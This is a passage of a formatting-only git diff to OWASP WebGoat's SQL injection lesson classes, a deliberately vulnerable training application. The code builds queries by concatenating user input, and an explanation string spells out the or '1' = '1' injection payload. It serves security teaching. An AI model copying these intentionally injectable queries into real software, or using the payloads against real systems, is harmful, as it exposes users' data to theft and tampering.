 import org.springframework.web.bind.annotation.RestController;
 
-import java.sql.*;
-
-
 @RestController
 @AssignmentHints(value = {"SqlStringInjectionHint5a1"})
 public class SqlInjectionLesson5a extends AssignmentEndpoint {
 
-    private static final String EXPLANATION = "<br> Explanation: This injection works, because <span style=\"font-style: italic\">or '1' = '1'</span> "
-            + "always evaluates to true (The string ending literal for '1 is closed by the query itself, so you should not inject it). "
-            + "So the injected query basically looks like this: <span style=\"font-style: italic\">SELECT * FROM user_data WHERE first_name = 'John' and last_name = '' or TRUE</span>, "
-            + "which will always evaluate to true, no matter what came before it.";
-    private final LessonDataSource dataSource;
+  private static final String EXPLANATION =
+      "<br> Explanation: This injection works, because <span style=\"font-style: italic\">or '1' ="
+          + " '1'</span> always evaluates to true (The string ending literal for '1 is closed by"
+          + " the query itself, so you should not inject it). So the injected query basically looks"
+          + " like this: <span style=\"font-style: italic\">SELECT * FROM user_data WHERE"
+          + " first_name = 'John' and last_name = '' or TRUE</span>, which will always evaluate to"
+          + " true, no matter what came before it.";
+  private final LessonDataSource dataSource;
 
-    public SqlInjectionLesson5a(LessonDataSource dataSource) {
-        this.dataSource = dataSource;
-    }
+  public SqlInjectionLesson5a(LessonDataSource dataSource) {
+    this.dataSource = dataSource;
+  }
 
-    @PostMapping("/SqlInjection/assignment5a")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String account, @RequestParam String operator, @RequestParam String injection) {
-        return injectableQuery(account + " " + operator + " " + injection);
-    }
+  @PostMapping("/SqlInjection/assignment5a")
+  @ResponseBody
+  public AttackResult completed(
+      @RequestParam String account, @RequestParam String operator, @RequestParam String injection) {
+    return injectableQuery(account + " " + operator + " " + injection);
+  }
 
-    protected AttackResult injectableQuery(String accountName) {
-        String query = "";
-        try (Connection connection = dataSource.getConnection()) {
-            query = "SELECT * FROM user_data WHERE first_name = 'John' and last_name = '" + accountName + "'";
-            try (Statement statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_UPDATABLE)) {
-                ResultSet results = statement.executeQuery(query);
+  protected AttackResult injectableQuery(String accountName) {
+    String query = "";
+    try (Connection connection = dataSource.getConnection()) {
+      query =
+          "SELECT * FROM user_data WHERE first_name = 'John' and last_name = '" + accountName + "'";
+      try (Statement statement =
+          connection.createStatement(
+              ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_UPDATABLE)) {
+        ResultSet results = statement.executeQuery(query);
 
-                if ((results != null) && (results.first())) {
-                    ResultSetMetaData resultsMetaData = results.getMetaData();
-                    StringBuilder output = new StringBuilder();
+        if ((results != null) && (results.first())) {
+          ResultSetMetaData resultsMetaData = results.getMetaData();
+          StringBuilder output = new StringBuilder();
 
-                    output.append(writeTable(results, resultsMetaData));
-                    results.last();
-
-                    // If they get back more than one user they succeeded
-                    if (results.getRow() >= 6) {
-                        return success(this).feedback("sql-injection.5a.success").output("Your query was: " + query + EXPLANATION).feedbackArgs(output.toString()).build();
-                    } else {
-                        return failed(this).output(output.toString() + "<br> Your query was: " + query).build();
-                    }
-                } else {
-                    return failed(this).feedback("sql-injection.5a.no.results").output("Your query was: " + query).build();
-                }
-            } catch (SQLException sqle) {
-                return failed(this).output(sqle.getMessage() + "<br> Your query was: " + query).build();
-            }
-        } catch (Exception e) {
-            return failed(this).output(this.getClass().getName() + " : " + e.getMessage() + "<br> Your query was: " + query).build();
-        }
-    }
-
-    public static String writeTable(ResultSet results, ResultSetMetaData resultsMetaData) throws SQLException {
-        int numColumns = resultsMetaData.getColumnCount();
-        results.beforeFirst();
-        StringBuilder t = new StringBuilder();
-        t.append("<p>");
-
-        if (results.next()) {
-            for (int i = 1; i < (numColumns + 1); i++) {
-                t.append(resultsMetaData.getColumnName(i));
-                t.append(", ");
-            }
-
-            t.append("<br />");
-            results.beforeFirst();
-
-            while (results.next()) {
-
-                for (int i = 1; i < (numColumns + 1); i++) {
-                    t.append(results.getString(i));
-                    t.append(", ");
-                }
-
-                t.append("<br />");
-            }
+          output.append(writeTable(results, resultsMetaData));
+          results.last();
 
+          // If they get back more than one user they succeeded
+          if (results.getRow() >= 6) {
+            return success(this)
+                .feedback("sql-injection.5a.success")
+                .output("Your query was: " + query + EXPLANATION)
+                .feedbackArgs(output.toString())
+                .build();
+          } else {
+            return failed(this).output(output.toString() + "<br> Your query was: " + query).build();
+          }
         } else {
-            t.append("Query Successful; however no data was returned from this query.");
+          return failed(this)
+              .feedback("sql-injection.5a.no.results")
+              .output("Your query was: " + query)
+              .build();
+        }
+      } catch (SQLException sqle) {
+        return failed(this).output(sqle.getMessage() + "<br> Your query was: " + query).build();
+      }
+    } catch (Exception e) {
+      return failed(this)
+          .output(
+              this.getClass().getName() + " : " + e.getMessage() + "<br> Your query was: " + query)
+          .build();
+    }
+  }
+
+  public static String writeTable(ResultSet results, ResultSetMetaData resultsMetaData)
+      throws SQLException {
+    int numColumns = resultsMetaData.getColumnCount();
+    results.beforeFirst();
+    StringBuilder t = new StringBuilder();
+    t.append("<p>");
+
+    if (results.next()) {
+      for (int i = 1; i < (numColumns + 1); i++) {
+        t.append(resultsMetaData.getColumnName(i));
+        t.append(", ");
+      }
+
+      t.append("<br />");
+      results.beforeFirst();
+
+      while (results.next()) {
+
+        for (int i = 1; i < (numColumns + 1); i++) {
+          t.append(results.getString(i));
+          t.append(", ");
         }
 
-        t.append("</p>");
-        return (t.toString());
+        t.append("<br />");
+      }
+
+    } else {
+      t.append("Query Successful; however no data was returned from this query.");
     }
+
+    t.append("</p>");
+    return (t.toString());
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson5b.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson5b.java
index e22b6e4b6..20225384f 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson5b.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson5b.java
@@ -22,6 +22,9 @@
 
 package org.owasp.webgoat.lessons.sqlinjection.introduction;
 
+import java.io.IOException;
+import java.sql.*;
+import javax.servlet.http.HttpServletRequest;
 import org.owasp.webgoat.container.LessonDataSource;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
@@ -31,68 +34,102 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import javax.servlet.http.HttpServletRequest;
-import java.io.IOException;
-import java.sql.*;
-
-
 @RestController
-@AssignmentHints(value = {"SqlStringInjectionHint5b1", "SqlStringInjectionHint5b2", "SqlStringInjectionHint5b3", "SqlStringInjectionHint5b4"})
+@AssignmentHints(
+    value = {
+      "SqlStringInjectionHint5b1",
+      "SqlStringInjectionHint5b2",
+      "SqlStringInjectionHint5b3",
+      "SqlStringInjectionHint5b4"
+    })
 public class SqlInjectionLesson5b extends AssignmentEndpoint {
 
-    private final LessonDataSource dataSource;
+  private final LessonDataSource dataSource;
 
-    public SqlInjectionLesson5b(LessonDataSource dataSource) {
-        this.dataSource = dataSource;
-    }
+  public SqlInjectionLesson5b(LessonDataSource dataSource) {
+    this.dataSource = dataSource;
+  }
 
-    @PostMapping("/SqlInjection/assignment5b")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String userid, @RequestParam String login_count, HttpServletRequest request) throws IOException {
-        return injectableQuery(login_count, userid);
-    }
+  @PostMapping("/SqlInjection/assignment5b")
+  @ResponseBody
+  public AttackResult completed(
+      @RequestParam String userid, @RequestParam String login_count, HttpServletRequest request)
+      throws IOException {
+    return injectableQuery(login_count, userid);
+  }
 
-    protected AttackResult injectableQuery(String login_count, String accountName) {
-        String queryString = "SELECT * From user_data WHERE Login_Count = ? and userid= " + accountName;
-        try (Connection connection = dataSource.getConnection()) {
-            PreparedStatement query = connection.prepareStatement(queryString, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+  protected AttackResult injectableQuery(String login_count, String accountName) {
+    String queryString = "SELECT * From user_data WHERE Login_Count = ? and userid= " + accountName;
+    try (Connection connection = dataSource.getConnection()) {
+      PreparedStatement query =
+          connection.prepareStatement(
+              queryString, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
 
-            int count = 0;
-            try {
-                count = Integer.parseInt(login_count);
-            } catch (Exception e) {
-                return failed(this).output("Could not parse: " + login_count + " to a number"
-                        + "<br> Your query was: " + queryString.replace("?", login_count)).build();
-            }
+      int count = 0;
+      try {
+        count = Integer.parseInt(login_count);
+      } catch (Exception e) {
+        return failed(this)
+            .output(
+                "Could not parse: "
+                    + login_count
+                    + " to a number"
+                    + "<br> Your query was: "
+                    + queryString.replace("?", login_count))
+            .build();
+      }
 
-            query.setInt(1, count);
-            //String query = "SELECT * FROM user_data WHERE Login_Count = " + login_count + " and userid = " + accountName, ;
-            try {
-                ResultSet results = query.executeQuery();
+      query.setInt(1, count);
+      // String query = "SELECT * FROM user_data WHERE Login_Count = " + login_count + " and userid
+      // = " + accountName, ;
+      try {
+        ResultSet results = query.executeQuery();
 
-                if ((results != null) && (results.first() == true)) {
-                    ResultSetMetaData resultsMetaData = results.getMetaData();
-                    StringBuilder output = new StringBuilder();
+        if ((results != null) && (results.first() == true)) {
+          ResultSetMetaData resultsMetaData = results.getMetaData();
+          StringBuilder output = new StringBuilder();
 
-                    output.append(SqlInjectionLesson5a.writeTable(results, resultsMetaData));
-                    results.last();
+          output.append(SqlInjectionLesson5a.writeTable(results, resultsMetaData));
+          results.last();
 
-                    // If they get back more than one user they succeeded
-                    if (results.getRow() >= 6) {
-                        return success(this).feedback("sql-injection.5b.success").output("Your query was: " + queryString.replace("?", login_count)).feedbackArgs(output.toString()).build();
-                    } else {
-                        return failed(this).output(output.toString() + "<br> Your query was: " + queryString.replace("?", login_count)).build();
-                    }
+          // If they get back more than one user they succeeded
+          if (results.getRow() >= 6) {
+            return success(this)
+                .feedback("sql-injection.5b.success")
+                .output("Your query was: " + queryString.replace("?", login_count))
+                .feedbackArgs(output.toString())
+                .build();
+          } else {
+            return failed(this)
+                .output(
+                    output.toString()
+                        + "<br> Your query was: "
+                        + queryString.replace("?", login_count))
+                .build();
+          }
 
-                } else {
-                    return failed(this).feedback("sql-injection.5b.no.results").output("Your query was: " + queryString.replace("?", login_count)).build();
-                }
-            } catch (SQLException sqle) {
-
-                return failed(this).output(sqle.getMessage() + "<br> Your query was: " + queryString.replace("?", login_count)).build();
-            }
-        } catch (Exception e) {
-            return failed(this).output(this.getClass().getName() + " : " + e.getMessage() + "<br> Your query was: " + queryString.replace("?", login_count)).build();
+        } else {
+          return failed(this)
+              .feedback("sql-injection.5b.no.results")
+              .output("Your query was: " + queryString.replace("?", login_count))
+              .build();
         }
+      } catch (SQLException sqle) {
+
+        return failed(this)
+            .output(
+                sqle.getMessage() + "<br> Your query was: " + queryString.replace("?", login_count))
+            .build();
+      }
+    } catch (Exception e) {
+      return failed(this)
+          .output(
+              this.getClass().getName()
+                  + " : "
+                  + e.getMessage()
+                  + "<br> Your query was: "
+                  + queryString.replace("?", login_count))
+          .build();
     }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson8.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson8.java
index 6870708b3..ae7fbb9f4 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson8.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson8.java
@@ -1,4 +1,3 @@
-
 /*
  * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
  *
@@ -23,6 +22,12 @@
 
 package org.owasp.webgoat.lessons.sqlinjection.introduction;
 
+import static java.sql.ResultSet.CONCUR_UPDATABLE;
+import static java.sql.ResultSet.TYPE_SCROLL_SENSITIVE;
+
+import java.sql.*;
+import java.text.SimpleDateFormat;
+import java.util.Calendar;
 import org.owasp.webgoat.container.LessonDataSource;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
@@ -32,112 +37,127 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import java.sql.*;
-import java.text.SimpleDateFormat;
-import java.util.Calendar;
-
-import static java.sql.ResultSet.CONCUR_UPDATABLE;
-import static java.sql.ResultSet.TYPE_SCROLL_SENSITIVE;
-
 @RestController
-@AssignmentHints(value = {"SqlStringInjectionHint.8.1", "SqlStringInjectionHint.8.2", "SqlStringInjectionHint.8.3", "SqlStringInjectionHint.8.4", "SqlStringInjectionHint.8.5"})
+@AssignmentHints(
+    value = {
+      "SqlStringInjectionHint.8.1",
+      "SqlStringInjectionHint.8.2",
+      "SqlStringInjectionHint.8.3",
+      "SqlStringInjectionHint.8.4",
+      "SqlStringInjectionHint.8.5"
+    })
 public class SqlInjectionLesson8 extends AssignmentEndpoint {
 
-    private final LessonDataSource dataSource;
+  private final LessonDataSource dataSource;
 
-    public SqlInjectionLesson8(LessonDataSource dataSource) {
-        this.dataSource = dataSource;
-    }
+  public SqlInjectionLesson8(LessonDataSource dataSource) {
+    this.dataSource = dataSource;
+  }
 
-    @PostMapping("/SqlInjection/attack8")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String name, @RequestParam String auth_tan) {
-        return injectableQueryConfidentiality(name, auth_tan);
-    }
+  @PostMapping("/SqlInjection/attack8")
+  @ResponseBody
+  public AttackResult completed(@RequestParam String name, @RequestParam String auth_tan) {
+    return injectableQueryConfidentiality(name, auth_tan);
+  }
 
-    protected AttackResult injectableQueryConfidentiality(String name, String auth_tan) {
-        StringBuilder output = new StringBuilder();
-        String query = "SELECT * FROM employees WHERE last_name = '" + name + "' AND auth_tan = '" + auth_tan + "'";
+  protected AttackResult injectableQueryConfidentiality(String name, String auth_tan) {
+    StringBuilder output = new StringBuilder();
+    String query =
+        "SELECT * FROM employees WHERE last_name = '"
+            + name
+            + "' AND auth_tan = '"
+            + auth_tan
+            + "'";
 
-        try (Connection connection = dataSource.getConnection()) {
-            try {
-                Statement statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_UPDATABLE);
-                log(connection, query);
-                ResultSet results = statement.executeQuery(query);
+    try (Connection connection = dataSource.getConnection()) {
+      try {
+        Statement statement =
+            connection.createStatement(
+                ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_UPDATABLE);
+        log(connection, query);
+        ResultSet results = statement.executeQuery(query);
 
-                if (results.getStatement() != null) {
-                    if (results.first()) {
-                        output.append(generateTable(results));
-                        results.last();
+        if (results.getStatement() != null) {
+          if (results.first()) {
+            output.append(generateTable(results));
+            results.last();
 
-                        if (results.getRow() > 1) {
-                            // more than one record, the user succeeded
-                            return success(this).feedback("sql-injection.8.success").output(output.toString()).build();
-                        } else {
-                            // only one record
-                            return failed(this).feedback("sql-injection.8.one").output(output.toString()).build();
-                        }
-
-                    } else {
-                        // no results
-                        return failed(this).feedback("sql-injection.8.no.results").build();
-                    }
-                } else {
-                    return failed(this).build();
-                }
-            } catch (SQLException e) {
-                return failed(this).output("<br><span class='feedback-negative'>" + e.getMessage() + "</span>").build();
-            }
-
-        } catch (Exception e) {
-            return failed(this).output("<br><span class='feedback-negative'>" + e.getMessage() + "</span>").build();
-        }
-    }
-
-    public static String generateTable(ResultSet results) throws SQLException {
-        ResultSetMetaData resultsMetaData = results.getMetaData();
-        int numColumns = resultsMetaData.getColumnCount();
-        results.beforeFirst();
-        StringBuilder table = new StringBuilder();
-        table.append("<table>");
-
-        if (results.next()) {
-            table.append("<tr>");
-            for (int i = 1; i < (numColumns + 1); i++) {
-                table.append("<th>" + resultsMetaData.getColumnName(i) + "</th>");
-            }
-            table.append("</tr>");
-
-            results.beforeFirst();
-            while (results.next()) {
-                table.append("<tr>");
-                for (int i = 1; i < (numColumns + 1); i++) {
-                    table.append("<td>" + results.getString(i) + "</td>");
-                }
-                table.append("</tr>");
+            if (results.getRow() > 1) {
+              // more than one record, the user succeeded
+              return success(this)
+                  .feedback("sql-injection.8.success")
+                  .output(output.toString())
+                  .build();
+            } else {
+              // only one record
+              return failed(this).feedback("sql-injection.8.one").output(output.toString()).build();
             }
 
+          } else {
+            // no results
+            return failed(this).feedback("sql-injection.8.no.results").build();
+          }
         } else {
-            table.append("Query Successful; however no data was returned from this query.");
+          return failed(this).build();
         }
+      } catch (SQLException e) {
+        return failed(this)
+            .output("<br><span class='feedback-negative'>" + e.getMessage() + "</span>")
+            .build();
+      }
 
-        table.append("</table>");
-        return (table.toString());
+    } catch (Exception e) {
+      return failed(this)
+          .output("<br><span class='feedback-negative'>" + e.getMessage() + "</span>")
+          .build();
+    }
+  }
+
+  public static String generateTable(ResultSet results) throws SQLException {
+    ResultSetMetaData resultsMetaData = results.getMetaData();
+    int numColumns = resultsMetaData.getColumnCount();
+    results.beforeFirst();
+    StringBuilder table = new StringBuilder();
+    table.append("<table>");
+
+    if (results.next()) {
+      table.append("<tr>");
+      for (int i = 1; i < (numColumns + 1); i++) {
+        table.append("<th>" + resultsMetaData.getColumnName(i) + "</th>");
+      }
+      table.append("</tr>");
+
+      results.beforeFirst();
+      while (results.next()) {
+        table.append("<tr>");
+        for (int i = 1; i < (numColumns + 1); i++) {
+          table.append("<td>" + results.getString(i) + "</td>");
+        }
+        table.append("</tr>");
+      }
+
+    } else {
+      table.append("Query Successful; however no data was returned from this query.");
     }
 
-    public static void log(Connection connection, String action) {
-        action = action.replace('\'', '"');
-        Calendar cal = Calendar.getInstance();
-        SimpleDateFormat sdf = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
-        String time = sdf.format(cal.getTime());
+    table.append("</table>");
+    return (table.toString());
+  }
 
-        String logQuery = "INSERT INTO access_log (time, action) VALUES ('" + time + "', '" + action + "')";
+  public static void log(Connection connection, String action) {
+    action = action.replace('\'', '"');
+    Calendar cal = Calendar.getInstance();
+    SimpleDateFormat sdf = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
+    String time = sdf.format(cal.getTime());
 
-        try {
-            Statement statement = connection.createStatement(TYPE_SCROLL_SENSITIVE, CONCUR_UPDATABLE);
-            statement.executeUpdate(logQuery);
-        } catch (SQLException e) {
-            System.err.println(e.getMessage());
-        }
+    String logQuery =
+        "INSERT INTO access_log (time, action) VALUES ('" + time + "', '" + action + "')";
+
+    try {
+      Statement statement = connection.createStatement(TYPE_SCROLL_SENSITIVE, CONCUR_UPDATABLE);
+      statement.executeUpdate(logQuery);
+    } catch (SQLException e) {
+      System.err.println(e.getMessage());
     }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson9.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson9.java
index 1377ea5eb..3df08175a 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson9.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson9.java
@@ -1,4 +1,3 @@
-
 /*
  * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
  *
@@ -23,6 +22,13 @@
 
 package org.owasp.webgoat.lessons.sqlinjection.introduction;
 
+import static org.hsqldb.jdbc.JDBCResultSet.CONCUR_UPDATABLE;
+import static org.hsqldb.jdbc.JDBCResultSet.TYPE_SCROLL_SENSITIVE;
+
+import java.sql.Connection;
+import java.sql.ResultSet;
+import java.sql.SQLException;
+import java.sql.Statement;
 import org.owasp.webgoat.container.LessonDataSource;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
@@ -32,79 +38,91 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import java.sql.Connection;
-import java.sql.ResultSet;
-import java.sql.SQLException;
-import java.sql.Statement;
-
-import static org.hsqldb.jdbc.JDBCResultSet.CONCUR_UPDATABLE;
-import static org.hsqldb.jdbc.JDBCResultSet.TYPE_SCROLL_SENSITIVE;
-
 @RestController
-@AssignmentHints(value = {"SqlStringInjectionHint.9.1", "SqlStringInjectionHint.9.2", "SqlStringInjectionHint.9.3", "SqlStringInjectionHint.9.4", "SqlStringInjectionHint.9.5"})
+@AssignmentHints(
+    value = {
+      "SqlStringInjectionHint.9.1",
+      "SqlStringInjectionHint.9.2",
+      "SqlStringInjectionHint.9.3",
+      "SqlStringInjectionHint.9.4",
+      "SqlStringInjectionHint.9.5"
+    })
 public class SqlInjectionLesson9 extends AssignmentEndpoint {
 
-    private final LessonDataSource dataSource;
+  private final LessonDataSource dataSource;
 
-    public SqlInjectionLesson9(LessonDataSource dataSource) {
-        this.dataSource = dataSource;
-    }
+  public SqlInjectionLesson9(LessonDataSource dataSource) {
+    this.dataSource = dataSource;
+  }
 
-    @PostMapping("/SqlInjection/attack9")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String name, @RequestParam String auth_tan) {
-        return injectableQueryIntegrity(name, auth_tan);
-    }
+  @PostMapping("/SqlInjection/attack9")
+  @ResponseBody
+  public AttackResult completed(@RequestParam String name, @RequestParam String auth_tan) {
+    return injectableQueryIntegrity(name, auth_tan);
+  }
 
-    protected AttackResult injectableQueryIntegrity(String name, String auth_tan) {
-        StringBuilder output = new StringBuilder();
-        String query = "SELECT * FROM employees WHERE last_name = '" + name + "' AND auth_tan = '" + auth_tan + "'";
-        try (Connection connection = dataSource.getConnection()) {
-            try {
-                Statement statement = connection.createStatement(TYPE_SCROLL_SENSITIVE, CONCUR_UPDATABLE);
-                SqlInjectionLesson8.log(connection, query);
-                ResultSet results = statement.executeQuery(query);
-                var test = results.getRow() != 0;
-                if (results.getStatement() != null) {
-                    if (results.first()) {
-                        output.append(SqlInjectionLesson8.generateTable(results));
-                    } else {
-                        // no results
-                        return failed(this).feedback("sql-injection.8.no.results").build();
-                    }
-                }
-            } catch (SQLException e) {
-                System.err.println(e.getMessage());
-                return failed(this).output("<br><span class='feedback-negative'>" + e.getMessage() + "</span>").build();
-            }
-
-            return checkSalaryRanking(connection, output);
-
-        } catch (Exception e) {
-            System.err.println(e.getMessage());
-            return failed(this).output("<br><span class='feedback-negative'>" + e.getMessage() + "</span>").build();
+  protected AttackResult injectableQueryIntegrity(String name, String auth_tan) {
+    StringBuilder output = new StringBuilder();
+    String query =
+        "SELECT * FROM employees WHERE last_name = '"
+            + name
+            + "' AND auth_tan = '"
+            + auth_tan
+            + "'";
+    try (Connection connection = dataSource.getConnection()) {
+      try {
+        Statement statement = connection.createStatement(TYPE_SCROLL_SENSITIVE, CONCUR_UPDATABLE);
+        SqlInjectionLesson8.log(connection, query);
+        ResultSet results = statement.executeQuery(query);
+        var test = results.getRow() != 0;
+        if (results.getStatement() != null) {
+          if (results.first()) {
+            output.append(SqlInjectionLesson8.generateTable(results));
+          } else {
+            // no results
+            return failed(this).feedback("sql-injection.8.no.results").build();
+          }
         }
+      } catch (SQLException e) {
+        System.err.println(e.getMessage());
+        return failed(this)
+            .output("<br><span class='feedback-negative'>" + e.getMessage() + "</span>")
+            .build();
+      }
+
+      return checkSalaryRanking(connection, output);
+
+    } catch (Exception e) {
+      System.err.println(e.getMessage());
+      return failed(this)
+          .output("<br><span class='feedback-negative'>" + e.getMessage() + "</span>")
+          .build();
     }
+  }
 
-    private AttackResult checkSalaryRanking(Connection connection, StringBuilder output) {
-        try {
-            String query = "SELECT * FROM employees ORDER BY salary DESC";
-            try (Statement statement = connection.createStatement(TYPE_SCROLL_SENSITIVE, CONCUR_UPDATABLE);
-            ) {
-                ResultSet results = statement.executeQuery(query);
+  private AttackResult checkSalaryRanking(Connection connection, StringBuilder output) {
+    try {
+      String query = "SELECT * FROM employees ORDER BY salary DESC";
+      try (Statement statement =
+          connection.createStatement(TYPE_SCROLL_SENSITIVE, CONCUR_UPDATABLE); ) {
+        ResultSet results = statement.executeQuery(query);
 
-                results.first();
-                // user completes lesson if John Smith is the first in the list
-                if ((results.getString(2).equals("John")) && (results.getString(3).equals("Smith"))) {
-                    output.append(SqlInjectionLesson8.generateTable(results));
-                    return success(this).feedback("sql-injection.9.success").output(output.toString()).build();
-                } else {
-                    return failed(this).feedback("sql-injection.9.one").output(output.toString()).build();
-                }
-            }
-        } catch (SQLException e) {
-            return failed(this).output("<br><span class='feedback-negative'>" + e.getMessage() + "</span>").build();
+        results.first();
+        // user completes lesson if John Smith is the first in the list
+        if ((results.getString(2).equals("John")) && (results.getString(3).equals("Smith"))) {
+          output.append(SqlInjectionLesson8.generateTable(results));
+          return success(this)
+              .feedback("sql-injection.9.success")
+              .output(output.toString())
+              .build();
+        } else {
+          return failed(this).feedback("sql-injection.9.one").output(output.toString()).build();
         }
+      }
+    } catch (SQLException e) {
+      return failed(this)
+          .output("<br><span class='feedback-negative'>" + e.getMessage() + "</span>")
+          .build();
     }
-
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/Servers.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/Servers.java
index 078f18d44..083e57061 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/Servers.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/Servers.java
@@ -22,6 +22,8 @@
 
 package org.owasp.webgoat.lessons.sqlinjection.mitigation;
 
+import java.util.ArrayList;
+import java.util.List;
 import lombok.AllArgsConstructor;
 import lombok.Getter;
 import lombok.extern.slf4j.Slf4j;
@@ -33,9 +35,6 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import java.util.ArrayList;
-import java.util.List;
-
 /**
  * @author nbaars
  * @since 6/13/17.
@@ -45,40 +44,50 @@ import java.util.List;
 @Slf4j
 public class Servers {
 
-    private final LessonDataSource dataSource;
+  private final LessonDataSource dataSource;
 
-    @AllArgsConstructor
-    @Getter
-    private class Server {
+  @AllArgsConstructor
+  @Getter
+  private class Server {
 
-        private String id;
-        private String hostname;
-        private String ip;
-        private String mac;
-        private String status;
-        private String description;
-    }
+    private String id;
+    private String hostname;
+    private String ip;
+    private String mac;
+    private String status;
+    private String description;
+  }
 
-    public Servers(LessonDataSource dataSource) {
-        this.dataSource = dataSource;
-    }
+  public Servers(LessonDataSource dataSource) {
+    this.dataSource = dataSource;
+  }
 
-    @GetMapping(produces = MediaType.APPLICATION_JSON_VALUE)
-    @ResponseBody
-    public List<Server> sort(@RequestParam String column) throws Exception {
-        List<Server> servers = new ArrayList<>();
+  @GetMapping(produces = MediaType.APPLICATION_JSON_VALUE)
+  @ResponseBody
+  public List<Server> sort(@RequestParam String column) throws Exception {
+    List<Server> servers = new ArrayList<>();
 
-        try (var connection = dataSource.getConnection()) {
-            try (var statement = connection.prepareStatement("select id, hostname, ip, mac, status, description from SERVERS where status <> 'out of order' order by " + column)) {
-                try (var rs = statement.executeQuery()) {
-                    while (rs.next()) {
-                        Server server = new Server(rs.getString(1), rs.getString(2), rs.getString(3), rs.getString(4), rs.getString(5), rs.getString(6));
-                        servers.add(server);
-                    }
-                }
-            }
+    try (var connection = dataSource.getConnection()) {
+      try (var statement =
+          connection.prepareStatement(
+              "select id, hostname, ip, mac, status, description from SERVERS where status <> 'out"
+                  + " of order' order by "
+                  + column)) {
+        try (var rs = statement.executeQuery()) {
+          while (rs.next()) {
+            Server server =
+                new Server(
+                    rs.getString(1),
+                    rs.getString(2),
+                    rs.getString(3),
+                    rs.getString(4),
+                    rs.getString(5),
+                    rs.getString(6));
+            servers.add(server);
+          }
         }
-        return servers;
+      }
     }
-
+    return servers;
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionLesson10a.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionLesson10a.java
index 9c1c5a902..fbe551427 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionLesson10a.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionLesson10a.java
@@ -33,28 +33,38 @@ import org.springframework.web.bind.annotation.RestController;
 
 @RestController
 @Slf4j
-@AssignmentHints(value = {"SqlStringInjectionHint-mitigation-10a-1", "SqlStringInjectionHint-mitigation-10a-2"})
+@AssignmentHints(
+    value = {"SqlStringInjectionHint-mitigation-10a-1", "SqlStringInjectionHint-mitigation-10a-2"})
 public class SqlInjectionLesson10a extends AssignmentEndpoint {
 
-    private String[] results = {"getConnection", "PreparedStatement", "prepareStatement", "?", "?", "setString", "setString"};
+  private String[] results = {
+    "getConnection", "PreparedStatement", "prepareStatement", "?", "?", "setString", "setString"
+  };
 
-    @PostMapping("/SqlInjectionMitigations/attack10a")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String field1, @RequestParam String field2, @RequestParam String field3, @RequestParam String field4, @RequestParam String field5, @RequestParam String field6, @RequestParam String field7) {
-        String[] userInput = {field1, field2, field3, field4, field5, field6, field7};
-        int position = 0;
-        boolean completed = false;
-        for (String input : userInput) {
-            if (input.toLowerCase().contains(this.results[position].toLowerCase())) {
-                completed = true;
-            } else {
-                return failed(this).build();
-            }
-            position++;
-        }
-        if (completed) {
-            return success(this).build();
-        }
